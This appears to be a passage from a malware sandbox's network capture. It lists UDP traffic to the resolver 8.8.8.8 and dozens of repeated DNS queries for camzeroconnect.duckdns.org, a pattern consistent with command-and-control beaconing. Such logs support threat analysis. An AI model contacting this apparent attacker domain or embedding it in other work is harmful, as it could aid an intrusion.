                                                                                            Sep 27, 2024 14:02:15.619100094 CEST53646878.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:15.623501062 CEST6468753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:15.631732941 CEST53646878.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:15.635258913 CEST6468753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:15.644714117 CEST53646878.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:16.660229921 CEST6508453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:16.668685913 CEST53650848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:16.668862104 CEST6508453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:16.676539898 CEST53650848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:16.677236080 CEST6508453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:16.690076113 CEST53650848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:16.693144083 CEST6508453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:16.700191975 CEST53650848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:16.701165915 CEST6508453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:16.712657928 CEST53650848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:17.717761993 CEST6337353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:17.726962090 CEST53633738.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:17.727118015 CEST6337353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:17.733617067 CEST53633738.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:17.733748913 CEST6337353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:17.740940094 CEST53633738.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:17.741048098 CEST6337353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:17.748574018 CEST53633738.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:17.748682976 CEST6337353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:17.755320072 CEST53633738.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:18.763149023 CEST5620753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:18.778495073 CEST53562078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:18.778666973 CEST5620753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:18.799374104 CEST53562078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:18.799525976 CEST5620753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:18.813419104 CEST53562078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:18.813591957 CEST5620753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:18.831449032 CEST53562078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:18.831573963 CEST5620753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:18.854410887 CEST53562078.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:19.871073008 CEST5195553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:19.878428936 CEST53519558.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:19.879570961 CEST5195553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:19.889507055 CEST53519558.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:19.889919996 CEST5195553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:19.920315981 CEST53519558.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:19.920476913 CEST5195553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:19.937869072 CEST53519558.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:19.938009977 CEST5195553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:19.945465088 CEST53519558.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:20.965308905 CEST5897153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:20.974731922 CEST53589718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:20.987418890 CEST5897153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:20.994302034 CEST53589718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:23.449182034 CEST5101453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:23.462201118 CEST53510148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:23.463200092 CEST5101453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:23.478538990 CEST53510148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:23.479163885 CEST5101453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:23.489877939 CEST53510148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:23.490087032 CEST5101453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:23.498716116 CEST53510148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:23.499460936 CEST5101453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:23.506505966 CEST53510148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:24.521554947 CEST4969053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:24.529395103 CEST53496908.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:24.529992104 CEST4969053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:24.537921906 CEST53496908.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:24.539876938 CEST4969053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:24.547296047 CEST53496908.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:24.551565886 CEST4969053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:24.558698893 CEST53496908.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:24.560522079 CEST4969053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:24.567609072 CEST53496908.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:25.586810112 CEST6016953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:25.594616890 CEST53601698.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:02:25.594794989 CEST6016953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:02:25.603899956 CEST53601698.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:00.868678093 CEST53530898.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:01.780327082 CEST53507028.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:01.903004885 CEST5195153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:01.910651922 CEST53519518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:01.910816908 CEST5195153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:01.917521954 CEST53519518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:01.917651892 CEST5195153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:01.924494028 CEST53519518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:01.924629927 CEST5195153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:01.931413889 CEST53519518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:01.931567907 CEST5195153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:01.938533068 CEST53519518.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:02.780363083 CEST53507028.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:03.083863974 CEST6154953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:03.091680050 CEST53615498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:03.092003107 CEST6154953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:03.098715067 CEST53615498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:03.101176023 CEST6154953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:03.109014988 CEST53615498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:03.115180016 CEST6154953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:03.123436928 CEST53615498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:03.129276037 CEST6154953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:03.135947943 CEST53615498.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:04.158838034 CEST5799853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:04.165560961 CEST53579988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:04.165730000 CEST5799853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:04.173029900 CEST53579988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:04.173168898 CEST5799853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:04.180380106 CEST53579988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:04.180490017 CEST5799853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:04.187701941 CEST53579988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:04.187815905 CEST5799853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:04.194317102 CEST53579988.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:05.208309889 CEST6243953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:06.213185072 CEST6243953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:06.220433950 CEST53624398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:06.220741034 CEST6243953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:06.227550983 CEST53624398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:06.227938890 CEST6243953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:10.215622902 CEST53624398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:10.217060089 CEST6243953192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:10.223351955 CEST53624398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:11.234126091 CEST53624398.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:11.251039982 CEST5943253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:11.258416891 CEST53594328.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:11.258600950 CEST5943253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:11.268800974 CEST53594328.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:11.268968105 CEST5943253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:13.280126095 CEST5943253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:13.287338972 CEST53594328.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:13.293257952 CEST5943253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:13.300694942 CEST53594328.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:14.346698999 CEST5591053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:14.354059935 CEST53559108.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:14.354322910 CEST5591053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:14.362004042 CEST53559108.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:14.362245083 CEST5591053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:15.463165045 CEST53559108.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:15.465377092 CEST5591053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:15.476583004 CEST53559108.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:15.477320910 CEST5591053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:16.276185036 CEST53594328.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:20.487415075 CEST53559108.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:20.513539076 CEST6156453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:20.724675894 CEST53615648.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:20.727327108 CEST6156453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:21.735188961 CEST6156453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:21.743968964 CEST53615648.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:21.744133949 CEST6156453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:21.750809908 CEST53615648.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:21.750930071 CEST6156453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:21.758341074 CEST53615648.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:22.780183077 CEST5138453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:22.787866116 CEST53513848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:22.788068056 CEST5138453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:22.802057981 CEST53513848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:22.802196980 CEST5138453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:22.810877085 CEST53513848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:22.811011076 CEST5138453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:23.839494944 CEST53615648.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:26.805227995 CEST5138453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:26.839483023 CEST53513848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:27.817451000 CEST53513848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:27.858911991 CEST5378553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:27.866089106 CEST53537858.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:27.868410110 CEST5378553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:27.875403881 CEST53537858.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:27.877238035 CEST5378553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:29.878451109 CEST5378553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:29.885620117 CEST53537858.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:29.885818005 CEST5378553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:29.893071890 CEST53537858.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:30.901026964 CEST5527753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:30.908344030 CEST53552778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:30.908582926 CEST5527753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:30.915632963 CEST53552778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:30.915776968 CEST5527753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:30.922255039 CEST53552778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:30.922401905 CEST5527753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:30.929333925 CEST53552778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:30.929476976 CEST5527753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:30.936537981 CEST53552778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:31.943100929 CEST5118353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:31.950285912 CEST53511838.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:31.950442076 CEST5118353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:31.957325935 CEST53511838.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:31.957448959 CEST5118353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:31.964711905 CEST53511838.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:31.964853048 CEST5118353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:31.971112013 CEST53511838.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:31.971231937 CEST5118353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:31.978169918 CEST53511838.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:32.884155035 CEST53537858.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:32.988152027 CEST5702753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:32.996156931 CEST53570278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:32.999370098 CEST5702753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:33.007205963 CEST53570278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:33.013245106 CEST5702753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:33.027122974 CEST53570278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:33.028222084 CEST5702753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:33.060317039 CEST53570278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:33.063311100 CEST5702753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:33.082410097 CEST53570278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:34.098870039 CEST5038053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:34.105576992 CEST53503808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:34.105849981 CEST5038053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:34.112112045 CEST53503808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:34.112404108 CEST5038053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:36.118577003 CEST5038053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:36.134543896 CEST53503808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:36.135509014 CEST5038053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:36.146959066 CEST53503808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:37.162839890 CEST5615653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:37.171109915 CEST53561568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:37.171395063 CEST5615653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:37.179757118 CEST53561568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:37.183876991 CEST5615653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:37.201328039 CEST53561568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:37.203316927 CEST5615653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:37.212629080 CEST53561568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:37.215513945 CEST5615653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:39.127368927 CEST53503808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:39.353874922 CEST53561568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:40.369716883 CEST6097153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:40.483434916 CEST53609718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:40.483668089 CEST6097153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:41.484903097 CEST6097153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:41.592226028 CEST53609718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:41.595396996 CEST6097153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:41.615974903 CEST53609718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:41.616406918 CEST6097153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:41.644957066 CEST53609718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:42.663310051 CEST5630853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:42.671911001 CEST53563088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:42.672385931 CEST5630853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:42.679816961 CEST53563088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:42.681231022 CEST5630853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:42.688930988 CEST53563088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:42.689261913 CEST5630853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:42.697402000 CEST53563088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:42.701257944 CEST5630853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:42.707848072 CEST53563088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:43.722898960 CEST5126853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:43.730081081 CEST53512688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:43.730235100 CEST5126853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:43.737183094 CEST53512688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:43.737288952 CEST5126853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:43.744046926 CEST53512688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:43.744151115 CEST5126853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:43.752101898 CEST53512688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:43.752209902 CEST5126853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:43.759710073 CEST53512688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:44.765592098 CEST5947553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:44.772829056 CEST53594758.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:44.773000002 CEST5947553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:44.780010939 CEST53594758.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:44.780136108 CEST5947553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:45.023657084 CEST53594758.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:45.023869038 CEST5947553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:45.031347990 CEST53594758.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:45.031570911 CEST5947553192.168.2.228.8.8.8
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                            Sep 27, 2024 14:01:21.802154064 CEST192.168.2.228.8.8.80x1697Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:22.816242933 CEST192.168.2.228.8.8.80x1697Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:23.923522949 CEST192.168.2.228.8.8.80x1697Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:24.926367998 CEST192.168.2.228.8.8.80x1697Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.021008968 CEST192.168.2.228.8.8.80x498aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.028477907 CEST192.168.2.228.8.8.80x498aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.036076069 CEST192.168.2.228.8.8.80x498aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.043359041 CEST192.168.2.228.8.8.80x498aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.050223112 CEST192.168.2.228.8.8.80x498aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.356870890 CEST192.168.2.228.8.8.80x7aadStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.364816904 CEST192.168.2.228.8.8.80x7aadStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.372700930 CEST192.168.2.228.8.8.80x7aadStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.379908085 CEST192.168.2.228.8.8.80x7aadStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.387646914 CEST192.168.2.228.8.8.80x7aadStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:28.412928104 CEST192.168.2.228.8.8.80xb1f6Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:28.599522114 CEST192.168.2.228.8.8.80xb1f6Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:29.602075100 CEST192.168.2.228.8.8.80xb1f6Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:29.609379053 CEST192.168.2.228.8.8.80xb1f6Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:30.701396942 CEST192.168.2.228.8.8.80xb1f6Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:31.732510090 CEST192.168.2.228.8.8.80x4c24Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:31.740382910 CEST192.168.2.228.8.8.80x4c24Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:31.746861935 CEST192.168.2.228.8.8.80x4c24Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:31.754096031 CEST192.168.2.228.8.8.80x4c24Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:35.748786926 CEST192.168.2.228.8.8.80x4c24Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.892534018 CEST192.168.2.228.8.8.80xfad8Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.900552034 CEST192.168.2.228.8.8.80xfad8Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.912480116 CEST192.168.2.228.8.8.80xfad8Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.931924105 CEST192.168.2.228.8.8.80xfad8Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.942250013 CEST192.168.2.228.8.8.80xfad8Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:37.969182014 CEST192.168.2.228.8.8.80x37f7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:37.981447935 CEST192.168.2.228.8.8.80x37f7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:37.993057013 CEST192.168.2.228.8.8.80x37f7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:38.005044937 CEST192.168.2.228.8.8.80x37f7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:38.025048971 CEST192.168.2.228.8.8.80x37f7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:39.052650928 CEST192.168.2.228.8.8.80x1e58Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:39.059912920 CEST192.168.2.228.8.8.80x1e58Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:39.159463882 CEST192.168.2.228.8.8.80x1e58Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:41.170875072 CEST192.168.2.228.8.8.80x1e58Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
